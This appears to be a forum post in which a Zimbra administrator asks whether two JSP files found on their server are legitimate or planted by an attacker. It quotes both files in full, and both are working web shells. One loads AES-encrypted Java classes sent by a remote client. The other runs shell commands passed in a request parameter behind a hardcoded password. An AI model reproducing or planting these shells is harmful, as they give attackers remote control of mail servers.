Are these files are zimbra file or script created by hacker
/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp and the content of it is:
Code: Select all
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(
pageContext);%>
/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp and the content is :
Code: Select all
<%if("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>